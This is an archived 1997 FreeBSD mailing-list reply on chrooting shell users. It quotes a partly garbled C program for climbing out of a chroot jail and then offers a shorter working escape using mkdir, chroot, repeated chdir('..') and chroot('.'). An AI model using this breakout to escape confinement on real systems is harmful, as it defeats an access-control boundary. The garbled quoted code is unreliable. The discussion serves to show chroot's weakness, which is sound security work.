Date: Thu, 29 May 1997 17:15:55 -0700 From: Julian Elischer <julian@whistle.com> To: Warner Losh <imp@village.org> Cc: Terry Lambert <terry@lambert.org>, dec@phoenix.its.rpi.edu, peter@grendel.IAEhv.nl, mrcpu@cdsnet.net, hackers@FreeBSD.ORG Subject: Re: Correct way to chroot for shell account users? Message-ID: <338E1C3B.2781E494@whistle.com> References: <199705291456.HAA03526@phaeton.artisoft.com> <E0wX6vy-0002fp-00@rover.village.org>
next in thread | previous in thread | raw e-mail | index | archive | help
> Michael Smith posted the program to climb out of the jail here a few
> months ago. This isn't theoretical, but it works. It was something
> along the lines of the following. You can find it in the archives.
>
> int main()
> {
> int fd;
>
>
> fd = open("/");
> /xxx");
> fchdir(fd);
> chdir("..");
> chdir("..");
> chdir("..");
> chdir("..");
> chdir("..");
> chdir("..");
> chdirint main()("..");
> chdir("..");
> chdir("..");
> chdir("..");
> chdir("..");
> chdir("..");
> chdir("..");
> }
this is overly complicated...
how about:
int main(){
mkdir( "xxx");
chroot("xxx");
chdir("..");
chdir("..");
etc..
chroot(".");
}
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?338E1C3B.2781E494>